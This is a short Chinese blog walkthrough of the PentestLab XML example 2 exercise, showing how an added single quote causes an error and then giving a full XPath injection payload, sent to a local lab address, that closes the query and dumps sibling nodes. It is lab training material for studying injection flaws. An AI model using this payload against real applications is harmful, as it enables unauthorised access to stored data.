0
点赞
收藏
分享

微信扫一扫

PentestLab-web安全XML测试-EXP2


我们打开靶机

选择“example 2”


PentestLab-web安全XML测试-EXP2_单引号


观察页面


PentestLab-web安全XML测试-EXP2_php_02

我们尝试修改name参数


http://192.168.20.157/xml/example2.php?name=hacker%27


PentestLab-web安全XML测试-EXP2_xml_03


添加单引号报错

存在闭合的可能性


网上大神payload


hacker'or 1=1]/parent::*/ child::node()%00


完整的payload为


http://192.168.20.157/xml/example2.php?name=hacker%27or%201=1]/parent::*/%20child::node()%00


结果


PentestLab-web安全XML测试-EXP2_单引号_04


我们打开靶机

观察源码


PentestLab-web安全XML测试-EXP2_xml_05


上面的payload闭合了xpath参数

举报

相关推荐

0 条评论